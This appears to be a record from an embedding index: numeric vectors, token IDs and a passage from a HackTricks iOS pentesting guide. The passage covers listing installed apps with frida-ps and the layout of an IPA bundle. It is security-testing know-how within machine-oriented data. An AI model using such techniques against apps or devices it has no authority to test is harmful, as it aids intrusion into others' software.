0.09721009433269501, -0.2675090730190277, -0.2993319034576416, -0.2759901285171509, -0.2678457200527191, 0.6428570747375488, -0.6440725922584534, -0.445256769657135, -0.5102691054344177, -0.28183865547180176, 0.7539615035057068, -0.3540649116039276, -0.043091367930173874, 0.07610876858234406, 0.3843107521533966, 0.44638606905937195, -0.09181565046310425, -0.1998157948255539, -0.3393585979938507, -0.20974311232566833, 0.8219560980796814, 0.8713139295578003, -0.5315947532653809, 0.3277409076690674, 0.30210572481155396, 0.16927461326122284, -0.6146917939186096, -0.4203904867172241, 0.39213827252388, 0.9249974489212036, -0.2638634145259857, 0.28118160367012024, 0.09472101181745529, -0.0565391406416893, 0.4736523926258087, 0.7166538238525391, 0.3428371846675873, 0.8230763077735901, -0.6891075372695923, 0.1754913479089737, 0.1298913210630417, -0.444253534078598, 0.585342288017273, -0.6986501812934875, 0.68324875831604, 0.058622878044843674, 0.9040004014968872, -0.6886729598045349, 0.10185261070728302, 0.3598167300224304, 0.09851236641407013, -0.5047800540924072, -0.6957370638847351, 0.1851099133491516, -0.702474057674408, -0.6897225379943848, -0.03651877120137215, 0.06494681537151337, 0.15614837408065796, 0.023836283013224602, -0.10851015895605087, 0.46107763051986694, -0.8913289904594421, -0.2628016471862793, -0.26531782746315, -0.36710333824157715, -0.3634442687034607, 0.04698317497968674, -0.012029396370053291, -0.009450212121009827, -0.07354474812746048, 0.20146135985851288, 0.801863968372345, -1.1082592010498047, -0.0990251824259758, 0.06581276655197144, 0.6134166717529297, 1.1673145294189453, 0.3799932301044464, 0.06548580527305603, -0.3446316421031952, -0.06448950618505478, -0.5906720757484436, 0.7575192451477051, -0.17591886222362518, -0.3630983829498291, 0.4688730239868164, 0.05499672144651413, -0.27846312522888184, 0.05856595188379288, 0.02971545234322548, 0.43763330578804016, -0.4377317428588867, 0.24023960530757904, -0.00473381020128727, 0.8072763681411743, 0.20674991607666016, 0.4530647397041321, -0.537388801574707, 0.34863343834877014, -0.7402281761169434, -0.4647213816642761, -0.6303274631500244, -0.08323264867067337, 0.1604595184326172, 0.3500399887561798, -0.3523041009902954, 0.2928560972213745, 1.4121884107589722, 0.6013480424880981, -0.2581081688404083, -0.1830822080373764, 0.14553475379943848, 0.5955435633659363, -0.06270740926265717, 0.14204511046409607, -0.0021117012947797775, 0.9554991722106934, -0.4243273437023163, 0.21460455656051636, -0.10669834911823273, -0.512876570224762, -0.17592640221118927, -0.6161805987358093, -0.4813210070133209, 0.2484939992427826, -0.6210548281669617, 0.7020246386528015, 0.8486325144767761, 0.5437479019165039, -1.4480477571487427, -0.19025883078575134, -0.249788299202919, -1.885006308555603, -0.6764885783195496, 0.11992200464010239, 0.3146173655986786, 0.5506448149681091, -0.6088140606880188, -0.2717229127883911, 0.47922760248184204, 0.7866019606590271, -0.27541279792785645, 0.5067012310028076, 1.0271096229553223, 0.35533878207206726, -0.4079892933368683, -0.44593220949172974, 0.3854430317878723, -0.10763873904943466, -0.8827917575836182, 0.3560263514518738, -0.05061781778931618, -0.06921819597482681, -0.40343376994132996, 0.34079688787460327, 0.28504082560539246, 0.4684261679649353, -0.009002703242003918, -0.2510555386543274, 0.5520575046539307, 0.8526178598403931, -0.9585870504379272, -0.4155658781528473, -0.10707689821720123, 0.5663480758666992, 0.31635597348213196, 0.8637721538543701, 0.2589893639087677, -0.22243793308734894, 0.6063976287841797, 0.39666301012039185, -0.49066978693008423, 0.041538093239068985, -0.41496968269348145, 0.897266685962677, 0.7762814164161682, 0.37433502078056335, 0.5586382150650024, 0.2882658839225769, 0.23999635875225067, -0.38696858286857605, 0.459683358669281, 0.9275549650192261, -0.24360187351703644, 1.1875132322311401, 0.5101283192634583, -0.017452435567975044, -0.8451096415519714, -0.4740105867385864, 0.5831376910209656, 0.710071325302124, -0.12525539100170135, -0.7349146604537964, -0.28867802023887634, 0.223651722073555, -0.38489872217178345, -0.2607654929161072, 0.04389709606766701, 0.2849074900150299, -0.033305298537015915, 0.38304054737091064, 0.09125562757253647, -0.7433444261550903, -0.5495025515556335, -0.3650435209274292, -1.1744242906570435, -0.526226818561554, -0.7448228001594543, 0.08896833658218384, 0.12847310304641724, -0.3370504081249237, 0.4572056829929352, -0.2914734482765198, -0.3988937735557556, 0.07115962356328964, -0.08561480790376663, 0.15481728315353394, 0.41029298305511475, -0.23692578077316284, -0.5259614586830139, -0.049503304064273834, 0.03247782960534096, 0.6007636189460754, -0.23749350011348724, -0.08411172032356262, -0.12615461647510529, 0.4432757794857025, -0.013720356859266758, -0.43831562995910645, 0.5607926249504089, 0.5520405769348145, 0.11304881423711777, -0.04097500443458557, 0.33508622646331787, -0.05585932359099388, -0.031501319259405136, -0.0370623841881752, -0.18235598504543304, 0.4933813512325287, -0.12271871417760849, -0.04761785268783569, 0.09948588907718658, 0.10271557420492172, -0.0320407897233963, 0.34120020270347595, -0.26862484216690063, 0.48635610938072205, -0.6898751854896545, 0.7790979146957397, 0.23984390497207642, 0.32378414273262024, -0.0548202209174633, -0.3846803307533264, 0.07492092996835709, -0.45142507553100586, -0.24770504236221313, -0.3742174804210663, -0.06352473795413971, 0.0628897026181221, 0.1204637661576271, -1.2021700143814087, 0.40558621287345886, -0.39359480142593384, -0.4772321879863739, -0.38260507583618164, -0.6231146454811096, 0.4370947778224945, 0.0817418321967125, 0.26655226945877075, -0.3028632402420044, 0.0272043626755476, 0.10756955295801163, -0.22647446393966675, 0.06530281901359558, -0.43075990676879883, 0.34982743859291077, 0.24669495224952698, -0.26763153076171875, 0.7983773350715637, -0.04397100582718849, 0.1647423952817917, 0.15802350640296936, -0.006728085223585367, -0.22810690104961395, 0.04858190566301346, 0.5294663310050964, 0.6204216480255127, 0.2966817319393158, 0.1149216741323471, -0.6264524459838867, -0.3705480694770813, -0.08514425158500671, -0.6199049353599548, -0.11474762111902237, 0.058821987360715866, 0.5564461350440979, 0.356285035610199, -0.3243727385997772, -0.22075504064559937, -0.1337386965751648, 0.061450984328985214, 0.4694846272468567, -0.5755422711372375, 0.5973343253135681, 0.6486004590988159, -0.3296521008014679, 0.02252652868628502, -0.1838613897562027, -0.8602253198623657, 0.7678024172782898, -0.36274823546409607, 0.577415406703949, -0.3773033618927002, 0.32541322708129883, 0.08052285760641098, -0.03331338241696358, 0.6128986477851868, -0.36194583773612976, 0.3510197103023529, -0.5216205716133118, -0.14881372451782227, 0.012458286248147488, -0.599745512008667, -0.08903886377811432, -0.009004767052829266, -0.3151925802230835, -0.5005142092704773, -0.4329487085342407, -0.4978858232498169, 0.5592830777168274, 0.741858720779419, 1.1412408351898193, 0.5319247245788574, 0.7808669209480286, 0.16669349372386932, -0.21929976344108582, -0.10836315155029297, -0.28236451745033264, 0.7863027453422546, -0.29500406980514526, 0.6784995794296265, -0.11599277704954147, -0.1515805423259735, -0.0019205573480576277, 0.24724286794662476, -0.3484666347503662, 0.006965227425098419, 0.5162760019302368, -0.08260851353406906, -0.6997175812721252, -0.048810604959726334, 0.4631134569644928, -0.038212649524211884, -0.6089375019073486, 0.19271168112754822, 0.26401761174201965, 1.0977994203567505, 0.4460391104221344, -0.45367497205734253, -0.07729136943817139, -0.6311278939247131, 0.35416510701179504, 0.23115836083889008, -0.09781888127326965, -0.5916029214859009, -0.8294530510902405, -0.5316430926322937, -0.6594298481941223, 0.20870642364025116, 0.27082085609436035, 0.5090019106864929, 0.21926172077655792, -0.8126847147941589, 0.07888691127300262, 0.9556519389152527, -0.25808247923851013, -0.5467363595962524, -0.38008466362953186, -0.212507426738739, 0.19902554154396057, 0.4299536645412445, 0.03737358748912811, -0.6963054537773132, -0.16169123351573944, -0.33800631761550903, 0.34449100494384766, -0.6018606424331665, -0.15055206418037415, 0.28886544704437256, 0.10674376040697098, -0.4471023380756378, 0.36572155356407166, -0.6268104910850525, -0.36956432461738586, -0.07011384516954422, 0.5233864784240723, -0.18236687779426575, 0.2109730988740921, 1.1039783954620361, -0.2793574333190918, 0.04533681645989418, 0.2350177764892578, 0.5388736724853516, -0.23281797766685486, 0.18010838329792023, -0.2914727032184601, -0.7630055546760559, 0.5365787148475647, -0.5969210863113403, 0.46905237436294556, 0.8268728256225586, 0.4424234628677368, 0.25213587284088135, -0.1594594269990921, 0.5606006979942322, -0.19369930028915405, 0.026300650089979172, -0.800182044506073, -0.638376772403717, 0.08977746963500977, 0.31998711824417114, -0.3758092522621155, 0.12358985841274261, 0.2162637859582901, -0.03511432930827141, -0.2474002093076706, -0.5358809232711792, -0.5236186981201172, -0.6525468826293945, 0.16056077182292938, 0.16463209688663483, 0.01975962147116661, 0.389276385307312, 0.7806578874588013, 0.09387331455945969, -0.58329176902771, 0.1341123729944229, -0.5510013699531555, 0.21939772367477417, -0.9231460094451904, -0.38471946120262146, -0.5407941937446594, -0.08948130905628204, -0.12936455011367798, 0.0042889718897640705, -0.1948115974664688, -0.09164463728666306, 0.06893185526132584, 0.33257293701171875, 0.6030095219612122, -0.4732688367366791, -0.8634278774261475, 0.408523827791214, 0.35836124420166016, -0.561684250831604, -0.17510871589183807, 0.5606812834739685, -0.3131848871707916, 0.2499362826347351, 0.004652510397136211, 0.2056456357240677, -0.9673426151275635, -1.1167163848876953, -0.13122114539146423, -0.5227352380752563, 0.35106173157691956, -0.3220289647579193, -0.5017704963684082, 0.08397851884365082, 0.22070860862731934, 0.5170704126358032, -0.6601404547691345, -0.22756680846214294, -0.22766675055027008, -0.12987735867500305, -0.059469230473041534, -0.14430882036685944, -0.3571922183036804, -0.8968415856361389, 0.12516558170318604, 1.20724618434906, 0.27857857942581177, -0.28147512674331665, -0.025493213906884193, 0.03428010269999504, 0.3406347632408142, 0.01993720419704914, -0.2017970085144043, -0.8205466866493225, -0.8935867547988892, -0.09977443516254425, 0.2078905552625656, 0.6893978118896484, -0.06599027663469315, 0.44426435232162476, -0.59599369764328, 0.10185115784406662, 0.06847456842660904, 0.04324507713317871, 0.06808838248252869, 0.022454185411334038, 0.42091095447540283, -0.35404303669929504, -0.2396761178970337, 0.230473592877388, 0.6652846336364746, 0.5139058828353882, -0.3123151957988739, -0.02644401602447033, -0.22611922025680542, -0.435613751411438, -1.1834434270858765, 0.2894642949104309, -0.16824384033679962, -0.32601863145828247, -0.2586362659931183, 0.052163686603307724, 0.365419864654541, -0.21424072980880737, 0.4335324466228485, 0.8864126801490784, 0.6757010221481323, 0.1252748966217041, -0.9866718053817749, 0.45745113492012024, 0.03735610842704773, 0.039573948830366135, -0.01053464412689209, -0.22017323970794678, -0.2733958959579468, -0.14070387184619904, -0.40552860498428345, -0.09562519192695618, -0.2454223483800888, -0.4483222961425781, 0.8314952850341797, 0.3263325095176697, 0.8356907367706299, -0.20119239389896393, -0.7410438656806946, -0.5537803173065186, 0.1646805852651596, -0.37334686517715454, -0.31814682483673096, 0.5192378759384155, 0.4584222435951233, 0.4573116600513458, 0.20400631427764893, 0.30376124382019043, -0.6138818264007568, -0.14991416037082672, 0.9189289808273315, -0.08627127856016159, -0.5656057000160217, 0.9454726576805115, 0.39193713665008545, -0.5948336124420166, -0.23241722583770752, -0.033730410039424896, -0.2007663995027542, 0.06796823441982269, -0.5745587348937988, -0.11052750051021576, 0.20337466895580292, -0.3824288845062256, 0.4553923010826111, 0.4386698007583618, -0.22597165405750275, 0.1563342809677124, -0.6886841654777527, 0.5468248724937439, -0.0030501855071634054, 0.24529147148132324, 0.5103157758712769, -0.3050956428050995, -0.22934216260910034, -1.130038857460022, -0.4779497981071472, 0.20053741335868835, -0.3620994985103607, 0.6710919737815857, -0.5763721466064453, 0.3369620144367218, -0.46522051095962524, 0.6978266835212708, 0.4453415870666504, 0.05095403641462326, -0.05087370425462723, 0.2570520341396332, 0.2613695561885834, -0.8443911075592041, -0.3722477853298187, 0.10141756385564804, 0.27251186966896057, 0.8106316924095154, -0.4364478886127472, -0.3864695131778717, -0.1745299994945526, 0.2087416648864746, -0.4940958619117737, -0.7632924914360046, -1.202224850654602, -0.6605671644210815, -0.0755312591791153, 0.2598634362220764, -0.1797347217798233, 0.08545783162117004, -0.09486016631126404, -0.4513392448425293, -0.21859386563301086, -0.27155396342277527, -0.18929608166217804, -0.232269749045372, 0.12599638104438782, -0.347283273935318, 0.31143155694007874, -0.6767279505729675, -0.17180362343788147, -0.12929899990558624, -0.05869737267494202, -0.23491457104682922, -0.9733537435531616, -0.5331300497055054, 0.7207229137420654, -0.7371309995651245, 0.6141449809074402, -0.47460073232650757, -0.43434637784957886, -0.5119556188583374, -0.942284345626831, -0.2344915270805359, 1.2276027202606201, -0.3725820779800415, 0.04571244493126869, -0.05359934642910957, 0.05576261132955551, 0.07542352378368378, -0.7451384663581848, 0.15962134301662445, -0.10686417669057846, 0.19269731640815735, 0.2848499119281769, -0.0091219712048769, -0.4397450387477875, -0.3958262801170349, 0.2228895127773285, -0.5919885635375977, -0.5542568564414978, -0.5236112475395203, 0.11083478480577469, -0.3133679926395416, 0.28824615478515625, 0.3177398443222046, 0.3429231643676758, 0.4267128109931946, -0.003911515232175589, -0.6251059174537659, 0.4015894830226898, 0.27838149666786194, -0.20983286201953888, 0.09821032732725143, -0.3979640007019043, 0.23655153810977936, -0.5064859986305237, 0.1260194480419159, 0.5357182621955872, -0.19679498672485352, 0.23109568655490875, 0.15317437052726746, -0.0773947611451149, -0.7647746205329895, -0.08801769465208054, -0.18553896248340607, 0.48739323019981384, 0.797420859336853, 0.24281471967697144, -0.3302668035030365, 0.010016822256147861, -0.22906380891799927, 0.12134447693824768, -0.8645510673522949, -0.5542269349098206, -0.12062836438417435, -0.18392691016197205, -0.30671074986457825, -0.22178350389003754, -0.26926127076148987, 0.01640956476330757, -0.11920151859521866, -0.029284095391631126, 0.3338644504547119, -0.3633628785610199, 0.47882214188575745, 1.1829040050506592, -0.9558250308036804, 0.03793678060173988, -0.3269975781440735, 0.31674978137016296, -0.7652270793914795, -0.8056341409683228, 0.021742425858974457, 0.8336824774742126, 0.26755383610725403, -0.06319651752710342, -0.026121625676751137, -0.30706989765167236, 0.4732826352119446, -0.3337485194206238, -0.10177135467529297, 0.39245152473449707, -0.594399631023407, 0.4952563941478729, -0.05869292467832565, -0.007664667442440987, -0.26580455899238586, 0.39152565598487854, 0.2587970495223999, -0.003959949593991041, -0.3961724042892456, 0.6924622654914856, 0.4648331105709076, -0.11891516298055649, 0.6127268671989441, 0.6261700391769409, 0.07003569602966309, -0.20624203979969025, -0.1652737259864807, 0.13261860609054565, 0.17735441029071808, 0.3460628390312195, 0.21527929604053497, -0.4688031077384949, 0.1630813479423523, 0.6051874160766602, -1.2209478616714478, -0.023086754605174065, 0.5317394137382507, 0.1459726095199585, 0.07764893770217896, 0.2155766487121582, -0.22780655324459076, -0.2751944661140442, 0.23078545928001404, -0.7112456560134888, 0.30401983857154846, 0.2511255741119385, -0.16849422454833984, 0.13933207094669342, -0.19372913241386414, 0.3552331328392029, -0.3979278802871704, 0.36000457406044006, -0.03287894278764725, -0.23482246696949005, 0.02286173775792122, -0.024544721469283104, -0.5140281319618225, 0.543900728225708, 0.6513036489486694, 0.10069463402032852, 0.06902094930410385, 0.6266041398048401, -0.5439274907112122, 0.5340917706489563, -0.11239258199930191, 0.2181391417980194, -0.3111162483692169, 0.38105887174606323, 0.37813350558280945, -0.4614172875881195, -0.10358180850744247, 0.5954090356826782, 0.12244798988103867, -0.16121932864189148, 0.6627025604248047, 0.12321291118860245, -0.08141777664422989, -0.4798791706562042, 0.29708316922187805, -0.2178441286087036, 0.2588830590248108, 0.011372942477464676, -0.3567531704902649, -0.6902549862861633, 0.43309545516967773, 0.36172324419021606, 0.777775764465332, 0.6759489178657532, 0.9432044625282288, -0.13891386985778809, 0.6494830846786499, 0.3223177194595337, 0.03173802047967911, -0.5072814226150513, -0.02527010627090931, -0.18863166868686676, -0.3604126572608948, 0.4646081030368805, -0.7471247911453247, 0.7528275847434998, 0.08848465234041214, -0.23765216767787933, -0.40131157636642456, 0.4190751314163208, -0.2975735664367676, -0.37319085001945496, 1.0272314548492432, 0.24171675741672516, -0.43437305092811584, -0.0029688654467463493, 0.05322861671447754, 0.09381799399852753, 0.5571794509887695, -0.38521426916122437, -0.2200346142053604, -0.4901926815509796, -0.1268143206834793, -0.36963844299316406, 1.1702567338943481, -0.4436628520488739, -0.33713027834892273, -0.1487843245267868, -0.8277680277824402, -0.6125935912132263, -0.2621714770793915, -0.2681911885738373, -0.43188387155532837, 0.59767085313797, 1.086450457572937, 0.00041321219759993255, 0.5630074143409729, -0.32869359850883484, 0.021371429786086082, 0.03460333123803139, 0.9573565125465393, -0.0647163912653923, 1.1529384851455688, 0.7741051316261292, 0.07745467126369476, -0.3620701730251312, -0.6312731504440308, 0.5864778161048889, -0.5765342712402344, 0.0811021625995636, -0.2897774875164032, -0.435817152261734, -0.8182297348976135, -0.45656096935272217, -0.10396918654441833, 0.05322517827153206, 0.4121011197566986, 0.09858103841543198, -1.3681526184082031, 0.004692828748375177, -0.7534468173980713, -0.31722596287727356, -0.46582335233688354, -0.17212364077568054, 0.06497231870889664, 0.4859499931335449, 0.6624770164489746, -0.9156582355499268, 4.530787944793701, 0.5788049697875977, 0.15275691449642181, 0.062426693737506866, 0.2987139821052551, 0.2651163339614868, 1.290974736213684, -0.3032563626766205, 0.4088502526283264, -0.9129441380500793, 0.07462199777364731, 0.28343701362609863, 0.23401989042758942, 0.08974014967679977, 0.43760308623313904, 0.6106992363929749, -0.7250279188156128, 0.32739144563674927, 0.13604828715324402, -0.8820924758911133, -0.9667806029319763, 0.03032151609659195, -0.5817509889602661, 0.8284866213798523, 0.2217952460050583, 0.22244390845298767, 0.26148298382759094, -0.7649925947189331, -0.13278229534626007, -0.05836014077067375, -0.055560704320669174, -0.5331093668937683, 0.15620891749858856, -0.6709371209144592, -0.8980276584625244, 0.0931447297334671, -0.0746045932173729, -1.1635510921478271, -0.0355747789144516, 0.2023329883813858, 0.1447630524635315, 0.4857315123081207, -0.30639877915382385, -0.5345823764801025, 0.5280160307884216, 0.9993734955787659, -0.6992436051368713, 0.09745881706476212, 0.5418701767921448, -1.0493934154510498, 0.6630918383598328, 0.02780141495168209, 1.1723285913467407, -0.18863965570926666, -0.43451812863349915, 0.07816664129495621, 0.1487727165222168, -0.10115783661603928, 0.1438673436641693, -0.3288511633872986, 0.5001407861709595, -0.20627526938915253, 0.5729953050613403, -0.2964944541454315, -0.37511584162712097, 1.1155110597610474, -0.326731413602829, 0.07836917787790298, 0.01301625743508339, -0.1349640190601349, -0.29712486267089844, -0.7289540767669678, -0.2753518521785736, -0.54013991355896, 1.2153273820877075, 0.3578239977359772, 0.07296238094568253, 0.31842583417892456, 0.09269320219755173, 0.16900023818016052, -0.22216081619262695, -0.5497328042984009, -1.4393678903579712, 0.5701383352279663, 0.4244209825992584, 0.7495258450508118, -0.31645599007606506, -0.7331903576850891, -0.05111776664853096, 0.6544806957244873, 0.20423397421836853, 0.05511118844151497, -0.3797931373119354, 0.07412178814411163, 0.13771477341651917 ]
[ 2006, 1996, 16380, 5080, 11439, 4747, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 6721, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 5034, 5685, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 14566, 1000, 1001, 2006, 11603, 17603, 2361, 1011, 29464, 2099, 1000, 1035, 6721, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 5034, 5685, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 14566, 1000, 16021, 29150, 1520, 6670, 10085, 1521, 3853, 1001, 2006, 1996, 16380, 5080, 11439, 4747, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 6670, 10085, 1000, 1001, 2006, 11603, 17603, 2361, 1011, 29464, 2099, 1000, 1035, 6670, 10085, 1000, 16021, 29150, 1998, 8211, 4972, 1001, 2006, 1996, 16380, 5080, 11439, 4747, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 4152, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 2033, 12458, 7685, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 2358, 6826, 21906, 2100, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 2358, 20927, 2078, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 5443, 16275, 6657, 24475, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 7020, 9336, 2546, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 2358, 5339, 6559, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 2035, 24755, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 9043, 2546, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 6140, 2546, 1000, 27178, 13669, 1011, 4921, 1026, 10439, 1028, 1064, 24665, 13699, 1011, 1059, 1000, 1035, 5443, 16550, 2546, 1000, 1001, 2006, 11603, 17603, 2361, 1011, 1054, 1000, 1035, 4152, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 2033, 12458, 7685, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 2358, 6826, 21906, 2100, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 2358, 20927, 2078, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 5443, 16275, 6657, 24475, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 7020, 9336, 2546, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 2358, 5339, 6559, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 2035, 24755, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 9043, 2546, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 6140, 2546, 1000, 24665, 13699, 1011, 29464, 2099, 1000, 1035, 5443, 16550, 2546, 1000, 3937, 8790, 4106, 5403, 3600, 2041, 1996, 8790, 4106, 2008, 11240, 22747, 4685, 1012, 2017, 2097, 2342, 2000, 22149, 2083, 1996, 2367, 5328, 1998, 11835, 2007, 2068, 2021, 2009, 2097, 2022, 8103, 2075, 2195, 4280, 2006, 2725, 2060, 2477, 1998, 2097, 7374, 1037, 3189, 2320, 2017, 2024, 2589, 1012, 10328, 5361, 18726, 2860, 10222, 14126, 18726, 2008, 2024, 5361, 2006, 1996 ]
hack_tricks
43.txt
1
device, you'll first have to figure out the correct bundle identifier of the application you want to analyze. you can use frida - ps - uai to get all apps ( - a ) currently installed ( - i ) on the connected usb device ( - u ) : $ frida - ps - uai pid name identifier - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 6847 calendar com. apple. mobilecal6815 mail com. apple. mobilemail - app store com. apple. appstore - apple store com. apple. store. jolly - calculator com. apple. calculator - camera com. apple. camera - igoat - swift owasp. igoat - swiftbasic enumeration & hookinglearn how to enumerate the components of the application and how to easily hook methods and classes with objection : ios hooking with objectionipa structure. ipa files are zipped packages, so you can change the extension to. zip and decompress them. a complete packaged app ready to be installed is commonly referred to as a bundle. after decompressing them you should see < name >. app, a zipped archive that contains the rest of the resources. info. plist : a file that contains some of the application specific configurations. _ codesignature / contains a plist file with a signature over all files in the bundle. assets. car : another zipped archive that contains assets ( icons ). frameworks / contains the app native libraries as. dylib or. framework files. plugins / may contain app extensions as. appex files ( not present in the example ). core data : it is used to save your application ’ s permanent data for offline use, to cache temporary data, and to add undo functionality to your app on a single device. to sync data across multiple devices in a single icloud account, core data automatically mirrors your schema to a cloudkit container. pkginfo : the pkginfo file is an alternate way to specify the type and creator codes of your application or bundle. en. lproj, fr. proj, base. lproj : are
[ 0.26348167657852173, -0.709961473941803, 0.012124619446694851, -0.01526730041950941, 0.09366144239902496, 0.4040829837322235, 0.01633378118276596, -0.013368462212383747, 0.3259350061416626, 0.7387579679489136, 0.0021217053290456533, 0.21124768257141113, 0.5466132164001465, -0.057841360569000244, -0.6850795745849609, -0.05510386452078819, -0.5835791826248169, 0.13576897978782654, -0.587764322757721, -0.04178115352988243, 0.18113215267658234, 0.9197805523872375, -0.5699570775032043, -0.6229115724563599, -0.34478822350502014, 0.47879326343536377, 0.7822542786598206, 0.43538862466812134, 0.5839033126831055, 0.4195786714553833, -0.13060151040554047, -0.0032048316206783056, -0.4651506245136261, -0.6827791333198547, 0.15071086585521698, -0.40642520785331726, 1.1599706411361694, -0.11811399459838867, 0.057131242007017136, -1.0584344863891602, 0.15228255093097687, -0.34661024808883667, 0.5472142696380615, -0.5598851442337036, -1.0257009267807007, -0.5145738124847412, 0.1338856965303421, -1.0548282861709595, 0.6610063314437866, -0.23734880983829498, 0.2049630731344223, 0.07598727196455002, 0.2989519536495209, 0.3921961486339569, 0.2520428001880646, -0.2243521511554718, 0.2259017676115036, 0.579453706741333, -0.34002184867858887, -0.012506676837801933, 0.03738594055175781, -0.006319905631244183, 0.13488100469112396, -0.5990163087844849, 0.23226067423820496, 0.8029308319091797, 0.0006235179607756436, 0.042160551995038986, 0.5626365542411804, -0.42693057656288147, -0.34832245111465454, 0.6673462986946106, -0.5267600417137146, -0.32580021023750305, -0.042671047151088715, -0.4801746904850006, 0.5725604295730591, -0.5984365940093994, 0.18098214268684387, 0.12412812560796738, -0.1591780185699463, 0.8956310749053955, 0.36044296622276306, -0.27786457538604736, -0.3917251229286194, -0.2343689203262329, 0.21790874004364014, 0.6078000068664551, -0.11093804240226746, -0.30954477190971375, 0.4562358260154724, 0.0223220381885767, -0.03899223729968071, -0.672655463218689, 0.25389188528060913, 0.9982983469963074, -0.20860059559345245, 0.31536561250686646, 0.4991185963153839, 0.14513768255710602, 1.2455915212631226, 1.0610551834106445, 0.2661477029323578, 0.7690137624740601, -0.6806160807609558, 0.3895196318626404, -0.005582567770034075, -0.35124471783638, -0.35488951206207275, -0.3238987624645233, 0.6761018633842468, 0.22151479125022888, 0.21447089314460754, -0.5993131995201111, -0.40581458806991577, -0.1120724156498909, 0.19022700190544128, 0.19410604238510132, -0.6492663621902466, 0.389838308095932, -0.5264983177185059, -0.13737435638904572, -0.11415606737136841, -0.4854053258895874, 0.23952582478523254, 0.24403415620326996, -0.6617475152015686, 0.8003799319267273, -0.5549179911613464, -0.300822377204895, -0.2537057399749756, -0.13656237721443176, 0.7717626094818115, 0.8554187417030334, -0.2558649182319641, 0.03636907786130905, -0.1003963053226471, 0.242157444357872, 0.3277112543582916, -0.5275794863700867, 0.09803339093923569, -0.030911440029740334, -0.12265269458293915, 1.083478331565857, 0.7231068015098572, 0.03621286153793335, -0.19453215599060059, -0.48403096199035645, 0.2894429862499237, 0.5069200396537781, -0.40861326456069946, 0.20189116895198822, 0.9292061924934387, -0.41500282287597656, -0.8997434377670288, 0.4406678378582001, 0.191975936293602, 0.5928356051445007, 0.09253252297639847, 0.06666839867830276, -0.1730823963880539, 0.4777778685092926, 0.19800038635730743, 0.5787226557731628, -0.12490201741456985, 0.6081764698028564, -0.9634150862693787, -0.3565111756324768, 0.4983025789260864, 0.37317365407943726, -0.2614980638027191, -0.4368021786212921, 0.06046498566865921, -0.2719844579696655, 1.2595120668411255, 0.2859956622123718, 0.09497015923261642, -0.29520973563194275, 0.1395774930715561, 0.27016258239746094, -0.8106266856193542, -0.34526118636131287, 0.1109922006726265, 0.4300083518028259, -0.538608968257904, 0.603280782699585, -0.8543825149536133, -0.2356380969285965, -0.2688245475292206, -0.4122109115123749, 0.1849740594625473, 0.28076013922691345, -0.5802831053733826, 0.6676597595214844, 0.5866726636886597, 0.4951961040496826, -1.2188600301742554, 0.12913104891777039, 0.8656473755836487, -1.4633269309997559, -0.8809817433357239, -0.30798575282096863, -0.2416960746049881, 0.3627597987651825, -0.8742725849151611, 0.2288193553686142, -0.04330172762274742, 0.9561716318130493, -0.771740734577179, 0.5354958176612854, 0.8890812993049622, 0.12455417215824127, -0.672156810760498, -0.5752579569816589, 0.12136635184288025, -0.8510838150978088, 0.06829925626516342, 0.844057023525238, 0.06172555685043335, 0.09645603597164154, 0.1849624365568161, 0.259522944688797, 0.9581602215766907, 0.39315178990364075, -0.052889540791511536, -0.5425490140914917, -0.18730290234088898, 0.5282886624336243, -0.8155497908592224, 0.19980758428573608, 0.020199932157993317, 0.8351461887359619, 0.49537765979766846, 0.8279239535331726, 0.1132185310125351, -0.18300524353981018, 0.8126168847084045, 0.3794911205768585, 0.288128137588501, 0.11751487851142883, 0.4117615222930908, 1.4839509725570679, 0.4994203746318817, 0.7299085259437561, 0.298178493976593, 0.31461668014526367, 0.004822400864213705, -0.24734224379062653, 0.21383611857891083, 1.1276206970214844, -0.5548439621925354, 1.3262466192245483, 1.0052587985992432, 0.11724703758955002, -0.5873451232910156, -0.9211781024932861, 0.8726016283035278, 1.1352698802947998, -0.5292392373085022, -0.7810115218162537, -0.01671685464680195, -0.5139719843864441, -0.00816569197922945, -0.4868067800998688, -0.30001816153526306, 0.08434336632490158, -0.31824880838394165, 0.23101195693016052, -0.6598787307739258, -0.4621164798736572, -0.6152058243751526, -0.4754069745540619, -1.0927942991256714, -0.3084036111831665, -1.04257333278656, 